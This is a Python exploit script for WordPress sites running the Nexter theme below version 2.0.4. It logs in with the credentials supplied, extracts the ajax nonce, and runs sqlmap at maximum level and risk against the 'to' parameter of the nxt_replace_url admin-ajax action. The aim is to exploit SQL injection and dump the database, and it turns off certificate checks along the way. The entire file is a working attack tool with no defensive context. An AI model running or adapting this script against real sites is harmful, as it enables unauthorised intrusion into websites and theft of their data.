import os import click import argparse import requests import subprocess import re from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) session = requests.Session() http_proxy = "" os.environ['HTTP_PROXY'] = http_proxy os.environ['HTTPS_PROXY'] = http_proxy def version_check(wordpress_url): headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'} plugin_url = ""+wordpress_url+"/wp-content/themes/nexter/style.css" response = requests.get(plugin_url, headers=headers,verify=False,timeout=30) if response.status_code == 200: content = response.text version_line = next((line for line in content.split('\n') if line.startswith('Stable tag:')), None) if version_line: version = version_line.split(':')[1].strip() if version >= '2.0.4': print("The theme version is 2.0.4 or above.") exit() else: print("The theme version is below 2.0.4.") return True else: print("Failed to find the version information in the style.css file.") exit() else: print("Plugin not installed") exit() def hack_em(username,password,wordpress_url,nonce,cookies): cookie_string = "; ".join([f"{name}={value}" for name, value in cookies.items()]) command = 'sqlmap -u "'+wordpress_url+'/wp-admin/admin-ajax.php" --data="action=nxt_replace_url&nexter_nonce='+nonce+'&from=test&to=test2&case=no" --referer="'+wordpress_url+'/wp-admin/admin.php?page=nexter_extra_options" --level 5 --risk 3 --threads 4 -p to --dbms=mysql --random-agent --cookie "'+cookie_string+'"' try: process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True) for line in iter(process.stdout.readline, ''): print(line.strip()) process.communicate() # Wait for the command to complete if process.returncode != 0: print(f"Command execution failed with error code {process.returncode}.") except subprocess.CalledProcessError as e: print(f"Command execution failed with error code {e.returncode}.") print(e.output) def sendem(username,password,wordpress_url): # Set up the session session = requests.Session() user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" # Define the login URL and credentials login_url = wordpress_url + '/wp-login.php' # Send a GET request to retrieve the login page and obtain necessary cookies response = session.get(login_url, headers={"User-Agent": user_agent}) # Extract the required cookies from the response headers cookies = response.cookies # Prepare the login data login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': wordpress_url + '/wp-admin/', 'testcookie': '1' } # Send a POST request to log in login_response = session.post(login_url, data=login_data, cookies=cookies, headers={"User-Agent": user_agent}) if any('wordpress_logged_in' in cookie.name for cookie in session.cookies): regex_pattern = r'"ajax_nonce":"(.*?)"' match = re.search(regex_pattern, login_response.text) if match: nonce = match.group(1) print("Nonce:", nonce) hack_em(username,password,wordpress_url,nonce,session.cookies) else: print("Nonce not found.") exit() if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-w", "--url", required=True, help="URL of the WordPress site") parser.add_argument("-u", "--username", required=True, help="Username of your wordpress user") parser.add_argument("-p", "--password", required=True, help="Password of your wordpress password") args = parser.parse_args() wordpress_url = args.url version_check(wordpress_url) username = args.username password = args.password sendem(username,password,wordpress_url)